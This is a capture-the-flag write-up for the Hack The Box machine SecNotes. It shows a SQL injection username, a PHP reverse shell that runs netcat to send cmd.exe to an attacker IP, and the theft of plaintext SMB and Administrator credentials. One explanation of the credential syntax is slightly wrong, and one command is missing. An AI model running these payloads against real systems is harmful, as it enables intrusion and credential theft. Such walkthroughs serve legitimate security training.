This is a write-up on the SecNotes machine access challenge from HTB. For more information on challenges like these, check out my post on penetration testing. Special thanks to HTB user 0xdf for creating the challenge.
SecNotes was a fun challenge with the makings of a good web hack and a layered attack structure. The premise is a very simple web application that lets users store notes securely.
Start with an nmap across all TCP ports. Traditional reconnaissance would typically include UDP and some flags to avoid detection, but it takes much longer and this is a game, so I sometimes skip UDP and go back to it later, or at least let it run in the background.
nmap -p- 10.10.10.97
This shows a web server running on port 80 and another on port 8808, as well as the samba service running on port 445. Standard web servers are always a good place to start, so point a browser to http://10.10.10.97. This shows the main page for a notes application. I created an account using the registration link and examined the different functions. I also looked through some of the source code, the objective at this point being access to notes saved by other users.
There are a few red herrings that can be avoided but certainly worth trying; in the end it's the headline "Viewing Secure Notes for ..." which gives it away. The username is echoed back to the page, and might be used elsewhere too. If there is no input validation on the username and it's used in a SQL query, it might be possible to craft a SQL injection to our advantage.
Logout and create a new account with this this username:
‘ OR ‘1’=’1
If used in a SQL query, this would always translate to true and may end up returning more results than was initially intended. Sure enough, this works. After logging in it possible to see the notes from every user, including one from user Tyler that contains credentials to a file share.
\\secnotes.htb\new-site tyler / 92g!mA8BGjOirkL%OG*&
Beyond the Notes Application
Using Tyler's password it is now possible to login to a samba file share for what appears to be a new website, presumably the one running on port 8808. Use the smbclient command to connect. Note that from a Linux/Unix machine it is necessary to escape each of the backslash characters that make up the share UNC.
smbclient \\\\10.10.10.97\\new-site -U tyler
A quick test using the samba put command and a browser shows that anything uploaded to the share becomes available on the webserver on port 8808, including php pages which can be executed.
The Reverse Shell
There's nothing readily available to use for a reverse shell, so download the windows version of netcat (I used nc64 from here). A php script to launch netcat will also be necessary. Create a file called reverse.php (be sure to replace 10.10.x.x with your own IP address).
<?php echo "<pre>"; $cmd = ('nc64 -e cmd.exe 10.10.x.x 1234'); system($cmd); echo "</pre>"; ?>
Upload the script and the netcat executable to the website using the put command on the samba client, then launch the shell.
On your local computer, run the command (this will hang): nc -lnvp 1234 On your browser: http://10.10.10.97:8808/reverse.php
The first command will open a local network socket that listens to incoming connections on port 1234, the second will invoke the reverse.php script on the server. This causes it to connect to the open port and run a Windows command prompt, with the output redirected to the netcat. Inotherwords, it is now possible to type commands into the window where the nc command is running. This will actually run the commands on the remote computer and display the output in the nc window. I started by navigating to C:\Users\tyler and poking around.
Note: Strange Behaviour
I noticed a few times that the files I uploaded to the server were deleted shortly afterwards. I found a script at C:\Users\tyler\cleanup\cleanup.ps1 which cleans the target directory and is probably launched by Task Scheduler every once in a while. I could have edited or disabled the script but it ran infrequent enough to pose a real nusiance and I just let it run, re-uploading files once or twice if needed.
On Tyler's desktop (C:\Users\tyler\Desktop) is the coveted user.txt which contains the first flag. Incidentally, there is also a file called bash.lnk. In Windows, lnk files represent shortcuts. A quickly and dirty way to see where the shortcut points is to view the contents of the file with the command type bash.lnk. This will produce a lot of gibberish but shows that the shortcut points to c:\windows\system32\bash.exe (this may be part of the official Windows for Linux Subsystem).
Running the default bash command in the reverse shell may not work correctly, so force it to run in interactive mode:
This should produce a bash shell inside the reverse shell, with root privileges. I always like to enumerate history, and in this case it's possible to just arrow up to and see the commands that root has run. Among them, is a command used to connect locally to the samba server using Administrator credentials.
smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$
Note that %u functions as a delimiter to separate username and password in smbclient's -U parameter. The Administrator password, therefore, is u6!4ZwgwOM#^OBf#Nwnh.
Owning the Machine
Log in to samba again, this time using the Administrator credentials and navigating to the the usual location for root.txt.
smbclient \\\\10.10.10.97\\c$ -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' cd c:\users\administrator\desktop type root.txt
Congratulations, the box is owned!